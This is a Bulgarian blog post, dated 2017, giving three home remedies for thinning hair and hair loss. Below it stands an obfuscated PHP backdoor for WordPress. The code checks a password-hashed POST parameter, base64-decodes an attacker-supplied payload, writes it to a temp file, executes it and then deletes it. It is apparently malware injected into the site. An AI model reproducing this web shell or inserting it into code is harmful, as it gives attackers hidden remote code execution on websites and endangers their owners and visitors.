3 рецепти при изтъняване на косата и косопад | Косопад

3 рецепти при изтъняване на косата и косопад

Изтъняването на косата е проблем, който засяга мъже, жени и деца. Това е състоянието, когато косъмът стане прекалено тънък и обикновено води до косопад, както и до разреждане.

Хората, които имат този проблем, имат обилен косопад. Нормалният брой косми, който можем да загубим за деня, е не повече от 100. Ако губите повече от това число, значи косопадът е обилен.

Има обаче различни природни средства, чрез които можем да се справим с това състояние.

Предлагаме ви няколко рецепти за сгъстяване и заздравяване на косата:

1. Зехтин и лимонов сок
Заради богатото съдържание на здравословни мазнини, минерали и аминокиселини, зехтинът е отлично средство срещу изтъняването на косата.
За приготвяне на рецептата са необходими: 2 -3 лъжици зехтин и 1/2 лъжица лимонов сок
Смесваме съставките. Нанася се в корените и се прави лек масаж за 5 минути. След това се оставя да престои на главата 1 час. Може да се завие с найлон и кърпа. След това се измива с вода и бебешки шампоан.
Прилага се 2 пъти седмично.

2. Сминдух
Семената на сминдуха съдържат мастни киселини, антиоксиданти и малки количества аминокиселини. По този начин помага за сгъстяване на косата и намалява косопада.
Необходими съставки са: 2 лъжици семена от сминдух и чаша вода (250 мл)
Загряваме водата и когато кипне, добавяме семената от сминдух. Оставяме ги да киснат, докато омекнат. След това се намачкват, за да се получи паста.
Начин на прилагане: Нанася се пастата от сминдуха в корените и се оставя да действа 30 минути. След това се измива със студена вода.
Прилага се 2 пъти седмично.

3. Рициново масло и мед
Мастните киселини, които се съдържат в рициновото масло, помагат за подхранването на късащата се коса. Така косъмът става по- дебел и здрав. Добавяме и мед, който хидратира и помага срещу косопада.
Необходими са: 1 лъжица рициново масло и ½ лъжица мед
Смесваме двете съставки. Нанасяме чрез лек масаж, който трае 5 минути. После оставяме да подейства още 30 минути. След това се измива.
Прилага се 2 пъти седмично.

18. ноември 2017 14:38:08 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}